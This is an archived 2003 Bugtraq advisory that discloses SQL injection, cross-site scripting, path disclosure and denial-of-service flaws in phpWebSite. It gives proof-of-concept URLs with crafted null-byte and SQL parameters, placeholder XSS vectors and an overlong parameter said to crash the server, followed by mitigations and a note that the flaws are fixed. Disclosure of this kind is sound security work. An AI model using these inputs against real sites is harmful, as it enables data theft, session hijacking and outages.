phpWebSite SQL Injection & DoS & XSS Vulnerabilities From: "Lorenzo Hernandez Garcia-Hierro" <novappc@novappc.com> To: bugtraq@securityfocus.com Date: 2003-08-11 01.16 phpWebSite SQL Injection & DoS & XSS Vulnerabilities ------ PRODUCT: phpWebSite VENDOR: Appalachian State University VULNERABLE VERSIONS: - 0.9.x - 0.8.x - 0.7.x - And older versions. NO VULNERABLE VERSIONS - ? --------------------- Description: phpWebSite provides a complete web site content management system. Web- based administration allows for easy maintenance of interactive, community-driven web sites. --------------------------------------------- |SECURITY HOLES FOUND and PROOFS OF CONCEPT:| --------------------------------------------- I encountered SQL Injection vulnerabilities in some of the phpWebSite modules , XSS ( Cross Site Scripting ) , Path Disclosures and a Denial of Service attack. ------------- | SQL | | INJECTION | ------------- I encountered SQL Injection vulnerabilities in the Calendar module , active in default configurations , that allows you to execute SQL queries in the target server with the privileges of the application user. When you send a special-crafted command url to the Calendar script you get a SQL error flag like this: __________________________________________________________________ DB Error: syntax error select * from mod_calendar_events where ((startDate >= 2003\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED VALUE]0110)) and active=1 [nativecode=1064 ** You have an error in your SQL syntax near '\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1] ___________________________________________________________________ This is an example error flag: ___________________________________________________________________ DB Error: syntax error select * from mod_calendar_events where ((startDate >= 2003\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1 [nativecode=1064 ** You have an error in your SQL syntax near '\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110 and endDate ' at line 1] ___________________________________________________________________ For get this you must use this simple url: http://[HOST]/[PATH]/index.php?module=calendar&calendar[view] =day&year=2003%00-1&month= And you get the SQL Error flag. The error occurs when the query includes the crafted value 2003[%00 = null]-1 . You can design a successful query for get configuration values or authentication data. I desgined an url that makes a successful query ( no hostile query ) : http://[HOST]/[PATH]/index.php?module=calendar&calendar[view] =month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or% 20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29% 29%20and%20active%3d1 it is ( without url encoding ) : 2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <= 20071205)) and active=1 It is needed to have a little knowledge of SQL ( in this case , MySQL ) for make a successful attack. Other scripts of the Calendar module are affected by this hole , when you send a crafted request like a + symbol at critical url variable value you get the "pure" sql server error flag and you can imagine ( i like this word ) a sql query for view private information of the application by looking at the error pages , like an try-error method. Another urls for probe are: http://[HOST]/[PATH]/index.php?module=calendar&calendar[view] =day&month=0&year=< http://[HOST]/[PATH]/index.php?module=calendar&calendar[view] =day&month=1%00&year=)SQL_INJECTION_FAKU ------------------ | XSS | | vulnerabilities| ------------------ I encountered XSS security holes in some scripts of phpWebSite : http://[HOST]/[PATH]/index.php?module=calendar&calendar[view] =day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE] http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user] =viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE] http://[HOST]/[PATH]/index.php? module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE] &MMN_position=[X:X] http://[HOST]/[PATH]/index.php? module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE] Note that the Calendar & PageMaster & Fatcat modules are affected COMPLETLY and all the script variables that are passed by url are affected too by this. When you access a hostile link with a xss attack in those scripts youur browser will execute the script commands. This can be use for steal cookies , authentication tokens and other private information. If your browser is vulnerable to other holes ( like MSIE ;-) you can have more problems... XSS AT SQL ERRORS: If you send a crafted url command with a XSS attack code to some of the scripts that are vulnerable against sql injection vulnerabilities , the xss attack code will be executed in the error page. ----------------- | PATH | | DISCLOSURES | ----------------- I tested this in a Win2K ( Windows 2000 Professional ) with SP3 and versions: - Sambar Server 5.2 beta - PHP 4.2.3 running as ISPAI module - MySQL NT [normal service] 3.23.56 - Include_Path to the pear folder of phpwebsite Sending this: http://127.0.0.1/index.php?module=calendar&calendar[view] =month&month=11&year=9 # You can try other things and get the same # you get this: Warning: localtime(): invalid local time in C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252 Warning: localtime(): invalid local time in C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252 <- more than fifty repetitions of this warning -> It is a strange error , i think that it only occurs in MSWindows installations. Possible it occurs when the Pear library TimeZone.php script tries to convert the localdate in unix time stamp format. ------------------ | DENIAL OF | | SERVICE | ------------------ There is a DoS/Buffer Overflow Attack in a script inside the Calendar module that allows you to crash the host running the MySQL server and the phpWebSite scripts ( must be the same computer ). This is a basic proof of concept for this vulnerability : http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar[view]= [VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes ) An attack like this causes a system global crash including the server service and the mysql service. ----------------- | SoLuTiOnS | ----------------- 1.- Be sure that the user of the phpWebSite database has only SELECT , INSERT and UPDATE privileges in only the phpWebSite database. 2.- Use the php function eregi_replace for prevent XSS attacks. 3.- Turn php_error_flags to Off . 4.- Use in addition an external module if you are using apache like mod_security . 5.- If you are paranoic don't use PHP , MySQL , Windows , Linux , computers , tcp/ip , netbios , games , asp , Apache...... nothing ! WARNING ;-) : ( paranoic solution... ) ----------- | CONTACT | ----------- Lorenzo Hernandez Garcia-Hierro --- Computer Security Analyzer --- --Nova Projects Professional Coding-- PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7 ********************************** www.novappc.com security.novappc.com www.lorenzohgh.com ______________________ NSRG-20-7
All those problems have been fixed in 0.9.3-1
glsa sent
